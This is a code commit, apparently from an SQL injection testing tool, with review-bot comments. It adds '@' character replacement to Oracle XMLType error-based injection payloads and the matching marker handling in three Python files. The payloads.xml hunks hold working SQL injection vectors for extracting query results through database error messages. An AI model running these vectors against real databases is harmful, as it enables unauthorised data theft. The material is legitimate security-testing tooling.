

Commit a89140e

committed
revisit of Oracle error-based payloads (added replacement of '@', a problematic character for the XMLType function)
1 parent 8a00ca8 commit a89140e

4 files changed

Lines changed: 10 additions & 8 deletions


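--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -213,6 +213,7 @@ def cleanupPayload(self, payload, origValue=None):
 payload = payload.replace("[RANDSTR1]", randStr1)
 payload = payload.replace("[DELIMITER_START]", kb.misc.start)
 payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
+payload = payload.replace("[AT_REPLACE]", kb.misc.at)
 payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
 payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
 payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))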
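Review bot: The new `[AT_REPLACE]` line carries no hint of why '@' needs a placeholder, and nothing in cleanupPayload itself explains it; the reason (the character is problematic for Oracle's XMLType(), per the commit message) lives in xml/payloads.xml and the reverse mapping in lib/techniques/error/use.py. A one-line comment above the three placeholder replacements, `# ' ', '$' and '@' are problematic inside Oracle XMLType() vectors; they travel as kb.misc markers and are restored in lib/techniques/error/use.py`, would point a reader at both places. cleanupPayload starts and ends outside the hunk.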

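--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1463,6 +1463,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
 kb.misc.delimiter = randomStr(length=6, lowercase=True)
 kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
 kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
+kb.misc.at = ":%s:" % randomStr(length=1, lowercase=True)
 kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True)
 kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True)
 kb.misc.forcedDbms = None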
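Review bot: `kb.misc.at` is built from one random lowercase letter exactly like `kb.misc.space` and `kb.misc.dollar` on the next two lines, so the three markers are drawn independently from 26 values and nothing guarantees they differ. If two coincide, the chained restore in `__errorReplaceChars` (lib/techniques/error/use.py) maps both markers to whichever literal comes first in its chain, so retrieved data containing '@' would silently come back as spaces or dollars. With two markers the collision chance was 1/26; with three it is about 11% (1 - 25*24/26^2). Redraw until they are distinct, e.g. wrap the three assignments in `while len({kb.misc.at, kb.misc.space, kb.misc.dollar}) < 3:` after an initial draw, or pick the three letters from one draw without replacement. __setKnowledgeBaseAttributes continues outside the hunk.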

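--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -185,7 +185,7 @@ def __errorReplaceChars(value):
 retVal = value
 
 if value:
-retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
+retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$").replace(kb.misc.at, "@")
 
 return retVal
 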
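Review bot: The restore chain in `__errorReplaceChars` now hand-mirrors the placeholder→marker substitutions that lib/core/agent.py applies and the marker values lib/core/option.py generates; adding '@' required the same edit in three files plus four vectors in xml/payloads.xml, which is how the next character will get missed in one of them. A single table of (placeholder, marker attribute, literal) that agent.py and this function both iterate would keep the forward and reverse mappings from drifting apart, and would let the restore here be a short loop instead of a growing method chain. The function also has no docstring; `"""Undo the marker substitutions (space, '$', '@') that the Oracle error-based vectors apply to [QUERY] output."""` states the contract. The hunk shows the whole function body; its signature is in the hunk header.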

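--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1117,7 +1117,7 @@ Formats:
 <risk>0</risk>
 <clause>1</clause>
 <where>1</where>
-<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 <request>
 <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 </request>
@@ -1335,9 +1335,9 @@ Formats:
 <risk>2</risk>
 <clause>1</clause>
 <where>2</where>
-<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 <request>
-<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1499,9 +1499,9 @@ Formats:
 <risk>0</risk>
 <clause>1,3</clause>
 <where>3</where>
-<vector>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+<vector>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 <request>
-<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1620,9 +1620,9 @@ Formats:
 <risk>0</risk>
 <clause>2,3</clause>
 <where>1</where>
-<vector>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+<vector>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
 <request>
-<payload>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+<payload>,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>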
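Review bot: The `<payload>` lines at old 1340, 1504 and 1625 also lose their `REPLACE(...,' ','[SPACE_REPLACE]')` wrapper in this commit, which the description ("added replace for '@'") does not mention; the change looks deliberate, since the CASE expression yields only 0 or 1 and the three probes now match the form already used at line 1122, but it deserves a sentence in the commit message. Separately, the three-deep chain `REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]')` is now copied verbatim into four vectors (1120, 1338, 1502, 1623), and the second, third and fourth previously lacked the '$' replacement that the first already had, which shows how easily these drift; a comment beside the first vector, `<!-- keep this REPLACE chain identical across all Oracle XMLType vectors and in sync with lib/core/agent.py and lib/techniques/error/use.py -->`, would at least flag the coupling. The enclosing `<test>` elements start before each hunk and end after it.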
